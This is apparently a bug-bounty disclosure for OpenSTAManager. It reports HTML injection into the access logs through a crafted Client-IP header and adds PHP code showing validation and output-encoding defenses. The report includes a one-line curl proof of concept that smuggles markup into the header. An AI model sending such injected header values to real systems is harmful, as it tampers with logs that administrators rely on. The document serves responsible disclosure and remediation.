Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in devcode-it/openstamanager

Valid

Reported on

Aug 14th 2021


✍️ Description

A user without access to the software can inject a fragment of HTML code into the access logs.

🕵️‍♂️ Proof of Concept

Simulate a login with a crafted Client-IP header like this:

curl -H 'Client-IP: <h1>INJECT</h1>' -d 'username=<your-username>&password=<your-password>&op=login' 'http://localhost/<your-path>/?op=login'

The result is: screen

💥 Impact

This vulnerability allows HTML code to be injected. Fortunately, the field for the IP address is only 15 characters long, too small to inject JavaScript code.

📍 Location functions.php#L188
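The pattern behind this finding and two defenses, as an added example (not code from the report or from OpenSTAManager): validate the header as an IP address before logging it, and HTML-encode the value when the log is rendered. All function names and the sample request are assumptions made for illustration.

```php
<?php
// Added example; function names are hypothetical, not the project's API.

// Vulnerable pattern: a client-supplied header is trusted and stored verbatim.
function client_ip_unsafe(array $server): string
{
    return $server['HTTP_CLIENT_IP'] ?? $server['REMOTE_ADDR'] ?? '';
}

// Defense 1 (input): accept a candidate only if it parses as an IPv4/IPv6
// address; otherwise fall back to the socket peer address.
// A syntactically valid Client-IP can still be spoofed, so it should only
// be honoured when the request arrives through a proxy you control.
function client_ip_validated(array $server): string
{
    $candidates = [$server['HTTP_CLIENT_IP'] ?? null, $server['REMOTE_ADDR'] ?? null];
    foreach ($candidates as $candidate) {
        if (!is_string($candidate)) {
            continue;
        }
        $candidate = trim($candidate);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return '0.0.0.0'; // nothing usable: log a neutral placeholder
}

// Defense 2 (output): encode every stored value when building the log view,
// so rows written before the fix cannot render as markup either.
function render_log_cell(string $value): string
{
    return '<td>' . htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Constructed sample request: the header value from the proof of concept
// (exactly 15 characters, so it fits the IP field) plus a documentation-range
// peer address.
$server = ['HTTP_CLIENT_IP' => '<h1>INJECT</h1>', 'REMOTE_ADDR' => '203.0.113.7'];

echo 'stored without validation: ', client_ip_unsafe($server), PHP_EOL;
echo 'stored with validation:    ', client_ip_validated($server), PHP_EOL;
echo 'legacy row, encoded view:  ', render_log_cell(client_ip_unsafe($server)), PHP_EOL;
```

Applying both layers matters here because the column length limit restricts what fits in the field but does not stop markup from being stored or rendered.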

FabioL modified the report
2 years ago
FabioL modified the report
2 years ago
We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 2 years ago
devcode-it/openstamanager maintainer validated this vulnerability 2 years ago
FabioL has been awarded the disclosure bounty
The fix bounty is now up for grabs
FabioL submitted a
2 years ago
devcode-it/openstamanager maintainer marked this as fixed with commit c965b3 2 years ago
FabioL has been awarded the fix bounty
This vulnerability will not receive a CVE